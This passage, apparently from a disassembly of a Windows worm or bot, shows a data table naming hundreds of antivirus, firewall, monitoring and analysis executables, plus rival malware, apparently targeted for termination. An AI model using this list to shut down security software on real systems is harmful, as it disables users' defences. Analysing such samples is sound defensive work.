dd offset aPccntmon_exe ; "PCCNTMON.EXE"
dd offset aPccwin97_exe ; "PCCWIN97.EXE"
dd offset aPccwin98_exe ; "PCCWIN98.EXE"
dd offset aPcdsetup_exe ; "PCDSETUP.EXE"
dd offset aPcfwallicon_ex ; "PCFWALLICON.EXE"
dd offset aPcip10117_0_ex ; "PCIP10117_0.EXE"
dd offset aPcscan_exe ; "PCSCAN.EXE"
dd offset aPdsetup_exe ; "PDSETUP.EXE"
dd offset aPenis_exe ; "PENIS.EXE"
dd offset aPeriscope_exe ; "PERISCOPE.EXE"
dd offset aPersfw_exe ; "PERSFW.EXE"
dd offset aPerswf_exe ; "PERSWF.EXE"
dd offset aPf2_exe ; "PF2.EXE"
dd offset aPfwadmin_exe ; "PFWADMIN.EXE"
dd offset aPgmonitr_exe ; "PGMONITR.EXE"
dd offset aPingscan_exe ; "PINGSCAN.EXE"
dd offset aPlatin_exe ; "PLATIN.EXE"
dd offset aPop3trap_exe ; "POP3TRAP.EXE"
dd offset aPoproxy_exe ; "POPROXY.EXE"
dd offset aPopscan_exe ; "POPSCAN.EXE"
dd offset aPortdetective_ ; "PORTDETECTIVE.EXE"
dd offset aPortmonitor_ex ; "PORTMONITOR.EXE"
dd offset aPowerscan_exe ; "POWERSCAN.EXE"
dd offset aPpinupdt_exe ; "PPINUPDT.EXE"
dd offset aPptbc_exe ; "PPTBC.EXE"
dd offset aPpvstop_exe ; "PPVSTOP.EXE"
dd offset aPrizesurfer_ex ; "PRIZESURFER.EXE"
dd offset aPrmt_exe ; "PRMT.EXE"
dd offset aPrmvr_exe ; "PRMVR.EXE"
dd offset aProcdump_exe ; "PROCDUMP.EXE"
dd offset aProcessmonitor ; "PROCESSMONITOR.EXE"
dd offset aProcexplorerv1 ; "PROCEXPLORERV1.0.EXE"
dd offset aProgramauditor ; "PROGRAMAUDITOR.EXE"
dd offset aProport_exe ; "PROPORT.EXE"
dd offset aProtectx_exe ; "PROTECTX.EXE"
dd offset aPspf_exe ; "PSPF.EXE"
dd offset aPurge_exe ; "PURGE.EXE"
dd offset aPussy_exe ; "PUSSY.EXE"
dd offset aPview95_exe ; "PVIEW95.EXE"
dd offset aQconsole_exe ; "QCONSOLE.EXE"
dd offset aQserver_exe ; "QSERVER.EXE"
dd offset aRapapp_exe ; "RAPAPP.EXE"
dd offset aRav7_exe ; "RAV7.EXE"
dd offset aRav7win_exe ; "RAV7WIN.EXE"
dd offset aRav8win32eng_e ; "RAV8WIN32ENG.EXE"
dd offset aRay_exe ; "RAY.EXE"
dd offset aRb32_exe ; "RB32.EXE"
dd offset aRcsync_exe ; "RCSYNC.EXE"
dd offset aRealmon_exe ; "REALMON.EXE"
dd offset aReged_exe ; "REGED.EXE"
dd offset aRegedit_exe ; "REGEDIT.EXE"
dd offset aRegedt32_exe ; "REGEDT32.EXE"
dd offset aRescue_exe ; "RESCUE.EXE"
dd offset aRescue32_exe ; "RESCUE32.EXE"
dd offset aRrguard_exe ; "RRGUARD.EXE"
dd offset aRshell_exe ; "RSHELL.EXE"
dd offset aRtvscan_exe ; "RTVSCAN.EXE"
dd offset aRtvscn95_exe ; "RTVSCN95.EXE"
dd offset aRulaunch_exe ; "RULAUNCH.EXE"
dd offset aRun32dll_exe ; "RUN32DLL.EXE"
dd offset aRundll_exe ; "RUNDLL.EXE"
dd offset aRundll16_exe ; "RUNDLL16.EXE"
dd offset aRuxdll32_exe ; "RUXDLL32.EXE"
dd offset aSafeweb_exe ; "SAFEWEB.EXE"
dd offset aSahagent_exe ; "SAHAGENT.EXE"
dd offset aSave_exe ; "SAVE.EXE"
dd offset aSavenow_exe ; "SAVENOW.EXE"
dd offset aSbserv_exe ; "SBSERV.EXE"
dd offset aSc_exe ; "SC.EXE"
dd offset aScam32_exe ; "SCAM32.EXE"
dd offset aScan32_exe ; "SCAN32.EXE"
dd offset aScan95_exe ; "SCAN95.EXE"
dd offset aScanpm_exe ; "SCANPM.EXE"
dd offset aScrscan_exe ; "SCRSCAN.EXE"
dd offset aScrsvr_exe ; "SCRSVR.EXE"
dd offset aScvhost_exe ; "SCVHOST.EXE"
dd offset aSd_exe ; "SD.EXE"
dd offset aServ95_exe ; "SERV95.EXE"
dd offset aService_exe ; "SERVICE.EXE"
dd offset aServlce_exe ; "SERVLCE.EXE"
dd offset aServlces_exe ; "SERVLCES.EXE"
dd offset aSetupvameeval_ ; "SETUPVAMEEVAL.EXE"
dd offset aSetup_flowprot ; "SETUP_FLOWPROTECTOR_US.EXE"
dd offset aSfc_exe ; "SFC.EXE"
dd offset aSgssfw32_exe ; "SGSSFW32.EXE"
dd offset aSh_exe ; "SH.EXE"
dd offset aShellspyinstal ; "SHELLSPYINSTALL.EXE"
dd offset aShn_exe ; "SHN.EXE"
dd offset aShowbehind_exe ; "SHOWBEHIND.EXE"
dd offset aSmc_exe ; "SMC.EXE"
dd offset aSms_exe ; "SMS.EXE"
dd offset aSmss32_exe ; "SMSS32.EXE"
dd offset aSoap_exe ; "SOAP.EXE"
dd offset aSofi_exe ; "SOFI.EXE"
dd offset aSperm_exe ; "SPERM.EXE"
dd offset aSpf_exe ; "SPF.EXE"
dd offset aSphinx_exe ; "SPHINX.EXE"
dd offset aSpoler_exe ; "SPOLER.EXE"
dd offset aSpoolcv_exe ; "SPOOLCV.EXE"
dd offset aSpoolsv32_exe ; "SPOOLSV32.EXE"
dd offset aSpyxx_exe ; "SPYXX.EXE"
dd offset aSrexe_exe ; "SREXE.EXE"
dd offset aSrng_exe ; "SRNG.EXE"
dd offset aSs3edit_exe ; "SS3EDIT.EXE"
dd offset aSsgrate_exe ; "SSGRATE.EXE"
dd offset aSsg_4104_exe ; "SSG_4104.EXE"
dd offset aSt2_exe ; "ST2.EXE"
dd offset aStart_exe ; "START.EXE"
dd offset aStcloader_exe ; "STCLOADER.EXE"
dd offset aSupftrl_exe ; "SUPFTRL.EXE"
dd offset aSupport_exe ; "SUPPORT.EXE"
dd offset aSupporter5_exe ; "SUPPORTER5.EXE"
dd offset aSvc_exe ; "SVC.EXE"
dd offset aSvchostc_exe ; "SVCHOSTC.EXE"
dd offset aSvchosts_exe ; "SVCHOSTS.EXE"
dd offset aSvshost_exe ; "SVSHOST.EXE"
dd offset aSweep95_exe ; "SWEEP95.EXE"
dd offset aSweepnet_sweep ; "SWEEPNET.SWEEPSRV.SYS.SWNETSUP.EXE"
dd offset aSymproxysvc_ex ; "SYMPROXYSVC.EXE"
dd offset aSymtray_exe ; "SYMTRAY.EXE"
dd offset aSysedit_exe ; "SYSEDIT.EXE"
dd offset aSystem_exe ; "SYSTEM.EXE"
dd offset aSystem32_exe ; "SYSTEM32.EXE"
dd offset aSysupd_exe ; "SYSUPD.EXE"
dd offset aTaskmg_exe ; "TASKMG.EXE"
dd offset aTaskmo_exe ; "TASKMO.EXE"
dd offset aTaskmon_exe ; "TASKMON.EXE"
dd offset aTaumon_exe ; "TAUMON.EXE"
dd offset aTbscan_exe ; "TBSCAN.EXE"
dd offset aTc_exe ; "TC.EXE"
dd offset aTca_exe ; "TCA.EXE"
dd offset aTcm_exe ; "TCM.EXE"
dd offset aTds3_exe ; "TDS-3.EXE"
dd offset aTds298_exe ; "TDS2-98.EXE"
dd offset aTds2Nt_exe ; "TDS2-NT.EXE"
dd offset aTeekids_exe ; "TEEKIDS.EXE"
dd offset aTfak_exe ; "TFAK.EXE"
dd offset aTfak5_exe ; "TFAK5.EXE"
dd offset aTgbob_exe ; "TGBOB.EXE"
dd offset aTitanin_exe ; "TITANIN.EXE"
dd offset aTitaninxp_exe ; "TITANINXP.EXE"
dd offset aTracert_exe ; "TRACERT.EXE"
dd offset aTrickler_exe ; "TRICKLER.EXE"
dd offset aTrjscan_exe ; "TRJSCAN.EXE"
dd offset aTrjsetup_exe ; "TRJSETUP.EXE"
dd offset aTrojantrap3_ex ; "TROJANTRAP3.EXE"
dd offset aTsadbot_exe ; "TSADBOT.EXE"
dd offset aTvmd_exe ; "TVMD.EXE"
dd offset aTvtmd_exe ; "TVTMD.EXE"
dd offset aUndoboot_exe ; "UNDOBOOT.EXE"
dd offset aUpdat_exe ; "UPDAT.EXE"
dd offset aUpdate_exe ; "UPDATE.EXE"
dd offset aUpdate_exe_0 ; "UPDATE.EXE"
dd offset aUpgrad_exe ; "UPGRAD.EXE"
dd offset aUtpost_exe ; "UTPOST.EXE"
dd offset aVbcmserv_exe ; "VBCMSERV.EXE"
dd offset aVbcons_exe ; "VBCONS.EXE"
dd offset aVbust_exe ; "VBUST.EXE"
dd offset aVbwin9x_exe ; "VBWIN9X.EXE"
dd offset aVbwinntw_exe ; "VBWINNTW.EXE"
dd offset aVcsetup_exe ; "VCSETUP.EXE"
dd offset aVet32_exe ; "VET32.EXE"
dd offset aVet95_exe ; "VET95.EXE"
dd offset aVettray_exe ; "VETTRAY.EXE"
dd offset aVfsetup_exe ; "VFSETUP.EXE"
dd offset aVirHelp_exe ; "VIR-HELP.EXE"
dd offset aVirusmdpersona ; "VIRUSMDPERSONALFIREWALL.EXE"
dd offset aVnlan300_exe ; "VNLAN300.EXE"
dd offset aVnpc3000_exe ; "VNPC3000.EXE"
dd offset aVpc32_exe ; "VPC32.EXE"
dd offset aVpc42_exe ; "VPC42.EXE"
dd offset aVpfw30s_exe ; "VPFW30S.EXE"
dd offset aVptray_exe ; "VPTRAY.EXE"
dd offset aVscan40_exe ; "VSCAN40.EXE"
dd offset aVscenu6_02d30_ ; "VSCENU6.02D30.EXE"
dd offset aVsched_exe ; "VSCHED.EXE"
dd offset aVsecomr_exe ; "VSECOMR.EXE"
dd offset aVshwin32_exe ; "VSHWIN32.EXE"
dd offset aVsisetup_exe ; "VSISETUP.EXE"
dd offset aVsmain_exe ; "VSMAIN.EXE"
dd offset aVsmon_exe ; "VSMON.EXE"
dd offset aVsstat_exe ; "VSSTAT.EXE"
dd offset aVswin9xe_exe ; "VSWIN9XE.EXE"
dd offset aVswinntse_exe ; "VSWINNTSE.EXE"
dd offset aVswinperse_exe ; "VSWINPERSE.EXE"
dd offset aW32dsm89_exe ; "W32DSM89.EXE"
dd offset aW9x_exe ; "W9X.EXE"
dd offset aWatchdog_exe ; "WATCHDOG.EXE"
dd offset aWebdav_exe ; "WEBDAV.EXE"
dd offset aWebscanx_exe ; "WEBSCANX.EXE"
dd offset aWebtrap_exe ; "WEBTRAP.EXE"
dd offset aWfindv32_exe ; "WFINDV32.EXE"
dd offset aWgfe95_exe ; "WGFE95.EXE"
dd offset aWhoswatchingme ; "WHOSWATCHINGME.EXE"
dd offset aWimmun32_exe ; "WIMMUN32.EXE"
dd offset aWinBugsfix_exe ; "WIN-BUGSFIX.EXE"
dd offset aWin32_exe ; "WIN32.EXE"
dd offset aWin32us_exe ; "WIN32US.EXE"
dd offset aWinactive_exe ; "WINACTIVE.EXE"
dd offset aWindow_exe ; "WINDOW.EXE"
dd offset aWindows_exe ; "WINDOWS.EXE"
dd offset aWininetd_exe ; "WININETD.EXE"
dd offset aWininit_exe ; "WININIT.EXE"
dd offset aWininitx_exe ; "WININITX.EXE"
dd offset aWinlogin_exe ; "WINLOGIN.EXE"
dd offset aWinmain_exe ; "WINMAIN.EXE"
dd offset aWinnet_exe ; "WINNET.EXE"
dd offset aWinppr32_exe ; "WINPPR32.EXE"
dd offset aWinrecon_exe ; "WINRECON.EXE"
dd offset aWinservn_exe ; "WINSERVN.EXE"
dd offset aWinssk32_exe ; "WINSSK32.EXE"
dd offset aWinstart_exe ; "WINSTART.EXE"
dd offset aWinstart001_ex ; "WINSTART001.EXE"
dd offset aWintsk32_exe ; "WINTSK32.EXE"
dd offset aWinupdate_exe ; "WINUPDATE.EXE"
dd offset aWkufind_exe ; "WKUFIND.EXE"
dd offset aWnad_exe ; "WNAD.EXE"
dd offset aWnt_exe ; "WNT.EXE"
dd offset aWradmin_exe ; "WRADMIN.EXE"
dd offset aWrctrl_exe ; "WRCTRL.EXE"
dd offset aWsbgate_exe ; "WSBGATE.EXE"
dd offset aWupdater_exe ; "WUPDATER.EXE"
dd offset aWupdt_exe ; "WUPDT.EXE"
dd offset aWyvernworksfir ; "WYVERNWORKSFIREWALL.EXE"
dd offset aXpf202en_exe ; "XPF202EN.EXE"
dd offset aZapro_exe ; "ZAPRO.EXE"
dd offset aZapsetup3001_e ; "ZAPSETUP3001.EXE"
dd offset aZatutor_exe ; "ZATUTOR.EXE"
dd offset aZonalm2601_exe ; "ZONALM2601.EXE"
dd offset aZonealarm_exe ; "ZONEALARM.EXE"
dd offset a_avp32_exe ; "_AVP32.EXE"
dd offset a_avpcc_exe ; "_AVPCC.EXE"
dd offset a_avpm_exe ; "_AVPM.EXE"
dd offset aHijackthis_exe ; "HIJACKTHIS.EXE"
dd offset aFAgobot_exe ; "F-AGOBOT.EXE"
dd offset aPandaavengine_ ; "PandaAVEngine.exe"
dd offset aSysinfo_exe ; "sysinfo.exe"
dd offset aMscvb32_exe ; "mscvb32.exe"
dd offset aPenis32_exe ; "Penis32.exe"
dd offset aBbeagle_exe ; "bbeagle.exe"
dd offset aSysmonxp_exe ; "SysMonXP.exe"
dd offset aWinupd_exe ; "winupd.exe"
dd offset aWinsys_exe ; "winsys.exe"
dd offset aSsate_exe ; "ssate.exe"
dd offset aRate_exe ; "rate.exe"
dd offset aD3dupdate_exe ; "d3dupdate.exe"
dd offset aIrun4_exe ; "irun4.exe"
dd offset aI11r54n4_exe ; "i11r54n4.exe"
aAckwin32_exe db 'ACKWIN32.EXE',0 ; DATA XREF: sub_40B4F2+EC�o
; .data:off_43B340�o
align 10h
aAdaware_exe db 'ADAWARE.EXE',0 ; DATA XREF: .data:0043B344�o
aAdvxdwin_exe db 'ADVXDWIN.EXE',0 ; DATA XREF: .data:0043B348�o
align 4
aAgentsvr_exe db 'AGENTSVR.EXE',0 ; DATA XREF: .data:0043B34C�o
align 4
aAgentw_exe db 'AGENTW.EXE',0 ; DATA XREF: .data:0043B350�o
align 4
aAlertsvc_exe db 'ALERTSVC.EXE',0 ; DATA XREF: .data:0043B354�o
align 4
aAlevir_exe db 'ALEVIR.EXE',0 ; DATA XREF: .data:0043B358�o
align 4
aAlogserv_exe db 'ALOGSERV.EXE',0 ; DATA XREF: .data:0043B35C�o
align 4
aAmon9x_exe db 'AMON9X.EXE',0 ; DATA XREF: .data:0043B360�o
align 10h
aAntiTrojan_exe db 'ANTI-TROJAN.EXE',0 ; DATA XREF: .data:0043B364�o
aAntivirus_exe db 'ANTIVIRUS.EXE',0 ; DATA XREF: .data:0043B368�o
align 10h
aAnts_exe db 'ANTS.EXE',0 ; DATA XREF: .data:0043B36C�o
align 4
aApimonitor_exe db 'APIMONITOR.EXE',0 ; DATA XREF: .data:0043B370�o
align 4
aAplica32_exe db 'APLICA32.EXE',0 ; DATA XREF: .data:0043B374�o
align 4
aApvxdwin_exe db 'APVXDWIN.EXE',0 ; DATA XREF: .data:0043B378�o
align 4
aArr_exe db 'ARR.EXE',0 ; DATA XREF: .data:0043B37C�o
aAtcon_exe db 'ATCON.EXE',0 ; DATA XREF: .data:0043B380�o
align 10h
aAtguard_exe db 'ATGUARD.EXE',0 ; DATA XREF: .data:0043B384�o
aAtro55en_exe db 'ATRO55EN.EXE',0 ; DATA XREF: .data:0043B388�o
align 4
aAtupdater_exe db 'ATUPDATER.EXE',0 ; DATA XREF: .data:0043B38C�o
align 4
aAtupdater_ex_0 db 'ATUPDATER.EXE',0 ; DATA XREF: .data:0043B390�o
align 4
aAtwatch_exe db 'ATWATCH.EXE',0 ; DATA XREF: .data:0043B394�o
aAu_exe db 'AU.EXE',0 ; DATA XREF: .data:0043B398�o
align 10h
aAupdate_exe db 'AUPDATE.EXE',0 ; DATA XREF: .data:0043B39C�o
aAupdate_exe_0 db 'AUPDATE.EXE',0 ; DATA XREF: .data:0043B3A0�o
aAutodown_exe db 'AUTODOWN.EXE',0 ; DATA XREF: .data:0043B3A4�o
align 4
aAutodown_exe_0 db 'AUTODOWN.EXE',0 ; DATA XREF: .data:0043B3A8�o
align 4
aAutotrace_exe db 'AUTOTRACE.EXE',0 ; DATA XREF: .data:0043B3AC�o
align 4
aAutotrace_ex_0 db 'AUTOTRACE.EXE',0 ; DATA XREF: .data:0043B3B0�o
align 4
aAutoupdate_exe db 'AUTOUPDATE.EXE',0 ; DATA XREF: .data:0043B3B4�o
align 4
aAutoupdate_e_0 db 'AUTOUPDATE.EXE',0 ; DATA XREF: .data:0043B3B8�o
align 4
aAvconsol_exe db 'AVCONSOL.EXE',0 ; DATA XREF: .data:0043B3BC�o
align 4
aAve32_exe db 'AVE32.EXE',0 ; DATA XREF: .data:0043B3C0�o
align 4
aAvgcc32_exe db 'AVGCC32.EXE',0 ; DATA XREF: .data:0043B3C4�o
aAvgctrl_exe db 'AVGCTRL.EXE',0 ; DATA XREF: .data:0043B3C8�o
aAvgnt_exe db 'AVGNT.EXE',0 ; DATA XREF: .data:0043B3CC�o
align 4
aAvgserv_exe db 'AVGSERV.EXE',0 ; DATA XREF: .data:0043B3D0�o
aAvgserv9_exe db 'AVGSERV9.EXE',0 ; DATA XREF: .data:0043B3D4�o
align 4
aAvguard_exe db 'AVGUARD.EXE',0 ; DATA XREF: .data:0043B3D8�o
aAvgw_exe db 'AVGW.EXE',0 ; DATA XREF: .data:0043B3DC�o
align 4
aAvkpop_exe db 'AVKPOP.EXE',0 ; DATA XREF: .data:0043B3E0�o
align 4
aAvkserv_exe db 'AVKSERV.EXE',0 ; DATA XREF: .data:0043B3E4�o
aAvkservice_exe db 'AVKSERVICE.EXE',0 ; DATA XREF: .data:0043B3E8�o
align 4
aAvkwctl9_exe db 'AVKWCTl9.EXE',0 ; DATA XREF: .data:0043B3EC�o
align 4
aAvltmain_exe db 'AVLTMAIN.EXE',0 ; DATA XREF: .data:0043B3F0�o
align 4
aAvnt_exe db 'AVNT.EXE',0 ; DATA XREF: .data:0043B3F4�o
align 10h
aAvp_exe db 'AVP.EXE',0 ; DATA XREF: .data:0043B3F8�o
aAvp32_exe db 'AVP32.EXE',0 ; DATA XREF: .data:0043B3FC�o
align 4
aAvpcc_exe db 'AVPCC.EXE',0 ; DATA XREF: .data:0043B400�o
align 10h
aAvpdos32_exe db 'AVPDOS32.EXE',0 ; DATA XREF: .data:0043B404�o
align 10h
aAvpm_exe db 'AVPM.EXE',0 ; DATA XREF: .data:0043B408�o
align 4
aAvptc32_exe db 'AVPTC32.EXE',0 ; DATA XREF: .data:0043B40C�o
aAvpupd_exe db 'AVPUPD.EXE',0 ; DATA XREF: .data:0043B410�o
align 4
aAvpupd_exe_0 db 'AVPUPD.EXE',0 ; DATA XREF: .data:0043B414�o
align 10h
aAvsched32_exe db 'AVSCHED32.EXE',0 ; DATA XREF: .data:0043B418�o
align 10h
aAvsynmgr_exe db 'AVSYNMGR.EXE',0 ; DATA XREF: .data:0043B41C�o
align 10h
aAvwin95_exe db 'AVWIN95.EXE',0 ; DATA XREF: .data:0043B420�o
aAvwinnt_exe db 'AVWINNT.EXE',0 ; DATA XREF: .data:0043B424�o
aAvwupd_exe db 'AVWUPD.EXE',0 ; DATA XREF: .data:0043B428�o
align 4
aAvwupd32_exe db 'AVWUPD32.EXE',0 ; DATA XREF: .data:0043B42C�o
align 4
aAvwupd32_exe_0 db 'AVWUPD32.EXE',0 ; DATA XREF: .data:0043B430�o
align 4
aAvwupsrv_exe db 'AVWUPSRV.EXE',0 ; DATA XREF: .data:0043B434�o
align 4
aAvxmonitor9x_e db 'AVXMONITOR9X.EXE',0 ; DATA XREF: .data:0043B438�o
align 4
aAvxmonitornt_e db 'AVXMONITORNT.EXE',0 ; DATA XREF: .data:0043B43C�o
align 4
aAvxquar_exe db 'AVXQUAR.EXE',0 ; DATA XREF: .data:0043B440�o
aAvxquar_exe_0 db 'AVXQUAR.EXE',0 ; DATA XREF: .data:0043B444�o
aBackweb_exe db 'BACKWEB.EXE',0 ; DATA XREF: .data:0043B448�o
aBargains_exe db 'BARGAINS.EXE',0 ; DATA XREF: .data:0043B44C�o
align 10h
aBd_professiona db 'BD_PROFESSIONAL.EXE',0 ; DATA XREF: .data:0043B450�o
aBeagle_exe db 'BEAGLE.EXE',0 ; DATA XREF: .data:0043B454�o
align 10h
aBelt_exe db 'BELT.EXE',0 ; DATA XREF: .data:0043B458�o
align 4
aBidef_exe db 'BIDEF.EXE',0 ; DATA XREF: .data:0043B45C�o
align 4
aBidserver_exe db 'BIDSERVER.EXE',0 ; DATA XREF: .data:0043B460�o
align 4
aBipcp_exe db 'BIPCP.EXE',0 ; DATA XREF: .data:0043B464�o
align 4
aBipcpevalsetup db 'BIPCPEVALSETUP.EXE',0 ; DATA XREF: .data:0043B468�o
align 4
aBisp_exe db 'BISP.EXE',0 ; DATA XREF: .data:0043B46C�o
align 4
aBlackd_exe db 'BLACKD.EXE',0 ; DATA XREF: .data:0043B470�o
align 10h
aBlackice_exe db 'BLACKICE.EXE',0 ; DATA XREF: .data:0043B474�o
align 10h
aBlss_exe db 'BLSS.EXE',0 ; DATA XREF: .data:0043B478�o
align 4
aBootconf_exe db 'BOOTCONF.EXE',0 ; DATA XREF: .data:0043B47C�o
align 4
aBootwarn_exe db 'BOOTWARN.EXE',0 ; DATA XREF: .data:0043B480�o
align 4
aBorg2_exe db 'BORG2.EXE',0 ; DATA XREF: .data:0043B484�o
align 4
aBpc_exe db 'BPC.EXE',0 ; DATA XREF: .data:0043B488�o
aBrasil_exe db 'BRASIL.EXE',0 ; DATA XREF: .data:0043B48C�o
align 4
aBs120_exe db 'BS120.EXE',0 ; DATA XREF: .data:0043B490�o
align 4
aBundle_exe db 'BUNDLE.EXE',0 ; DATA XREF: .data:0043B494�o
align 4
aBvt_exe db 'BVT.EXE',0 ; DATA XREF: .data:0043B498�o
aCcapp_exe db 'CCAPP.EXE',0 ; DATA XREF: .data:0043B49C�o
align 4
aCcevtmgr_exe db 'CCEVTMGR.EXE',0 ; DATA XREF: .data:0043B4A0�o
align 4
aCcpxysvc_exe db 'CCPXYSVC.EXE',0 ; DATA XREF: .data:0043B4A4�o
align 4
aCdp_exe db 'CDP.EXE',0 ; DATA XREF: .data:0043B4A8�o
aCfd_exe db 'CFD.EXE',0 ; DATA XREF: .data:0043B4AC�o
aCfgwiz_exe db 'CFGWIZ.EXE',0 ; DATA XREF: .data:0043B4B0�o
align 4
aCfiadmin_exe db 'CFIADMIN.EXE',0 ; DATA XREF: .data:0043B4B4�o
align 4
aCfiaudit_exe db 'CFIAUDIT.EXE',0 ; DATA XREF: .data:0043B4B8�o
align 4
aCfiaudit_exe_0 db 'CFIAUDIT.EXE',0 ; DATA XREF: .data:0043B4BC�o
align 4
aCfinet_exe db 'CFINET.EXE',0 ; DATA XREF: .data:0043B4C0�o
align 10h
aCfinet32_exe db 'CFINET32.EXE',0 ; DATA XREF: .data:0043B4C4�o
align 10h
aClaw95cf_exe db 'CLAW95CF.EXE',0 ; DATA XREF: .data:0043B4C8�o
align 10h
aClean_exe db 'CLEAN.EXE',0 ; DATA XREF: .data:0043B4CC�o
align 4
aCleaner_exe db 'CLEANER.EXE',0 ; DATA XREF: .data:0043B4D0�o
aCleaner3_exe db 'CLEANER3.EXE',0 ; DATA XREF: .data:0043B4D4�o
align 4
aCleanpc_exe db 'CLEANPC.EXE',0 ; DATA XREF: .data:0043B4D8�o
aClick_exe db 'CLICK.EXE',0 ; DATA XREF: .data:0043B4DC�o
align 10h
aCmd32_exe db 'CMD32.EXE',0 ; DATA XREF: .data:0043B4E0�o
align 4
aCmesys_exe db 'CMESYS.EXE',0 ; DATA XREF: .data:0043B4E4�o
align 4
aCmgrdian_exe db 'CMGRDIAN.EXE',0 ; DATA XREF: .data:0043B4E8�o
align 4
aCmon016_exe db 'CMON016.EXE',0 ; DATA XREF: .data:0043B4EC�o
aConnectionmoni db 'CONNECTIONMONITOR.EXE',0 ; DATA XREF: .data:0043B4F0�o
align 4
aCpd_exe db 'CPD.EXE',0 ; DATA XREF: .data:0043B4F4�o
aCpf9x206_exe db 'CPF9X206.EXE',0 ; DATA XREF: .data:0043B4F8�o
align 4
aCpfnt206_exe db 'CPFNT206.EXE',0 ; DATA XREF: .data:0043B4FC�o
align 4
aCtrl_exe db 'CTRL.EXE',0 ; DATA XREF: .data:0043B500�o
align 10h
aCv_exe db 'CV.EXE',0 ; DATA XREF: .data:0043B504�o
align 4
aCwnb181_exe db 'CWNB181.EXE',0 ; DATA XREF: .data:0043B508�o
aCwntdwmo_exe db 'CWNTDWMO.EXE',0 ; DATA XREF: .data:0043B50C�o
align 4
aClaw95_exe db 'Claw95.EXE',0 ; DATA XREF: .data:0043B510�o
align 10h
aClaw95cf_exe_0 db 'CLAW95CF.EXE',0 ; DATA XREF: .data:0043B514�o
align 10h
aDatemanager_ex db 'DATEMANAGER.EXE',0 ; DATA XREF: .data:0043B518�o
aDcomx_exe db 'DCOMX.EXE',0 ; DATA XREF: .data:0043B51C�o
align 4
aDefalert_exe db 'DEFALERT.EXE',0 ; DATA XREF: .data:0043B520�o
align 4
aDefscangui_exe db 'DEFSCANGUI.EXE',0 ; DATA XREF: .data:0043B524�o
align 4
aDefwatch_exe db 'DEFWATCH.EXE',0 ; DATA XREF: .data:0043B528�o
align 4
aDeputy_exe db 'DEPUTY.EXE',0 ; DATA XREF: .data:0043B52C�o
align 4
aDivx_exe db 'DIVX.EXE',0 ; DATA XREF: .data:0043B530�o
align 4
aDllcache_exe db 'DLLCACHE.EXE',0 ; DATA XREF: .data:0043B534�o
align 4
aDllreg_exe db 'DLLREG.EXE',0 ; DATA XREF: .data:0043B538�o
align 10h
aDoors_exe db 'DOORS.EXE',0 ; DATA XREF: .data:0043B53C�o
align 4
aDpf_exe db 'DPF.EXE',0 ; DATA XREF: .data:0043B540�o
aDpfsetup_exe db 'DPFSETUP.EXE',0 ; DATA XREF: .data:0043B544�o
align 4
aDpps2_exe db 'DPPS2.EXE',0 ; DATA XREF: .data:0043B548�o
align 10h
aDrwatson_exe db 'DRWATSON.EXE',0 ; DATA XREF: .data:0043B54C�o
align 10h
aDrweb32_exe db 'DRWEB32.EXE',0 ; DATA XREF: .data:0043B550�o
aDrwebupw_exe db 'DRWEBUPW.EXE',0 ; DATA XREF: .data:0043B554�o
align 4
aDssagent_exe db 'DSSAGENT.EXE',0 ; DATA XREF: .data:0043B558�o
align 4
aDvp95_exe db 'DVP95.EXE',0 ; DATA XREF: .data:0043B55C�o
align 4
aDvp95_0_exe db 'DVP95_0.EXE',0 ; DATA XREF: .data:0043B560�o
aEcengine_exe db 'ECENGINE.EXE',0 ; DATA XREF: .data:0043B564�o
align 4
aEfpeadm_exe db 'EFPEADM.EXE',0 ; DATA XREF: .data:0043B568�o
aEmsw_exe db 'EMSW.EXE',0 ; DATA XREF: .data:0043B56C�o
align 4
aEnt_exe db 'ENT.EXE',0 ; DATA XREF: .data:0043B570�o
aEsafe_exe db 'ESAFE.EXE',0 ; DATA XREF: .data:0043B574�o
align 10h
aEscanh95_exe db 'ESCANH95.EXE',0 ; DATA XREF: .data:0043B578�o
align 10h
aEscanhnt_exe db 'ESCANHNT.EXE',0 ; DATA XREF: .data:0043B57C�o
align 10h
aEscanv95_exe db 'ESCANV95.EXE',0 ; DATA XREF: .data:0043B580�o
align 10h
aEspwatch_exe db 'ESPWATCH.EXE',0 ; DATA XREF: .data:0043B584�o
align 10h
aEthereal_exe db 'ETHEREAL.EXE',0 ; DATA XREF: .data:0043B588�o
align 10h
aEtrustcipe_exe db 'ETRUSTCIPE.EXE',0 ; DATA XREF: .data:0043B58C�o
align 10h
aEvpn_exe db 'EVPN.EXE',0 ; DATA XREF: .data:0043B590�o
align 4
aExantivirusCne db 'EXANTIVIRUS-CNET.EXE',0 ; DATA XREF: .data:0043B594�o
align 4
aExe_avxw_exe db 'EXE.AVXW.EXE',0 ; DATA XREF: .data:0043B598�o
align 4
aExpert_exe db 'EXPERT.EXE',0 ; DATA XREF: .data:0043B59C�o
align 10h
aExplore_exe db 'EXPLORE.EXE',0 ; DATA XREF: .data:0043B5A0�o
aFAgnt95_exe db 'F-AGNT95.EXE',0 ; DATA XREF: .data:0043B5A4�o
align 4
aFProt_exe db 'F-PROT.EXE',0 ; DATA XREF: .data:0043B5A8�o
align 4
aFProt95_exe db 'F-PROT95.EXE',0 ; DATA XREF: .data:0043B5AC�o
align 4
aFStopw_exe db 'F-STOPW.EXE',0 ; DATA XREF: .data:0043B5B0�o
aFameh32_exe db 'FAMEH32.EXE',0 ; DATA XREF: .data:0043B5B4�o
aFast_exe db 'FAST.EXE',0 ; DATA XREF: .data:0043B5B8�o
align 4
aFch32_exe db 'FCH32.EXE',0 ; DATA XREF: .data:0043B5BC�o
align 4
aFih32_exe db 'FIH32.EXE',0 ; DATA XREF: .data:0043B5C0�o
align 4
aFindviru_exe db 'FINDVIRU.EXE',0 ; DATA XREF: .data:0043B5C4�o
align 4
aFirewall_exe db 'FIREWALL.EXE',0 ; DATA XREF: .data:0043B5C8�o
align 4
aFlowprotector_ db 'FLOWPROTECTOR.EXE',0 ; DATA XREF: .data:0043B5CC�o
align 4
aFnrb32_exe db 'FNRB32.EXE',0 ; DATA XREF: .data:0043B5D0�o
align 4
aFpWin_exe db 'FP-WIN.EXE',0 ; DATA XREF: .data:0043B5D4�o
align 10h
aFpWin_trial_ex db 'FP-WIN_TRIAL.EXE',0 ; DATA XREF: .data:0043B5D8�o
align 4
aFprot_exe db 'FPROT.EXE',0 ; DATA XREF: .data:0043B5DC�o
align 10h
aFrw_exe db 'FRW.EXE',0 ; DATA XREF: .data:0043B5E0�o
aFsaa_exe db 'FSAA.EXE',0 ; DATA XREF: .data:0043B5E4�o
align 4
aFsav_exe db 'FSAV.EXE',0 ; DATA XREF: .data:0043B5E8�o
